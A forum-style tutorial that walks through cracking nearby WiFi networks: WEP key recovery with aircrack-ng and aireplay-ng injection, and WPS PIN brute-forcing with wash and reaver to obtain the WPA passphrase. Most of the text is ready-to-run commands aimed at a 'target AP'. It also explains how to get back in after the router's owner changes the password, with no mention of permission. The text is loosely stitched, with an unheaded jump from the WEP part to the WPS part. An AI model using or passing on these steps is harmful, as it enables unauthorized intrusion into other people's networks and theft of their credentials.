I'm using BackTrack 5 r3 because the tools that I'm going to use come already installed, but you can use any other Linux distribution!
Let's Begin.
Open up a terminal and type:

    airmon-ng
This will show you your wireless card name. In my case it is called wlan1, but I also have wlan0. Now we need to set the wireless card to monitor mode. To do that, type:

    airmon-ng start wlan1

OK, your wireless card is now in monitor mode. If you type airmon-ng again, it'll show you mon0. After that, type:

    airodump-ng mon0
When you press Enter, it should show you all the access points near you. Copy the BSSID and remember the channel number of the target AP. Press CONTROL+c to cancel. Do this only when you have found and copied the info about the target AP.
To speed up this process, open up another terminal and type:

    aireplay-ng -1 0 -a [BSSID] mon0

After it says it was successful, type:

    aireplay-ng -3 -b [BSSID] mon0
When you reach 20000 of DATA, which will be really quick if you did what I said above, open another terminal and type:

    aircrack-ng wep-01.cap

Now, wait for some minutes and it should give you the PASSWORD! The password is:

    EF855844B288E4BB1BA9ADF14D
First, type:

    airmon-ng

As said earlier, this shows you your wireless card name. I'll use wlan0. We need to set the wireless card to monitor mode, so type:

    airmon-ng start wlan0

After that, type:

    airodump-ng mon0
Now, copy the BSSID of the target AP. Press CONTROL+c to cancel. To see the APs that are vulnerable to WPS attacks, type:

    wash -i mon0

If the target AP is vulnerable, it should say:

    WPS Locked: No
If the AP is limiting you with a message saying:

    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying

and if reaver says that it is trying the same PIN over and over, press CONTROL+c to cancel, then type:

    reaver --help

This will show you the help menu, and you can start playing with the options that you have. I usually add: -c -S -L

    reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv

This one works great for me, so keep playing with the options until it works! When it reaches 100% it should give you some lines. The password is the one after:

    WPS PSK: 'PASSWORD HERE'

And here it is! You should also remember the PIN.

    WPS PIN: PIN HERE

Now, let's say for some reason the router's owner changed the password for his WiFi. Since you already have the PIN, type:

    reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv
This took me a lot of time to write, so please comment :3 If you have any questions feel free to comment and/or PM ME! Thanks for reading guys!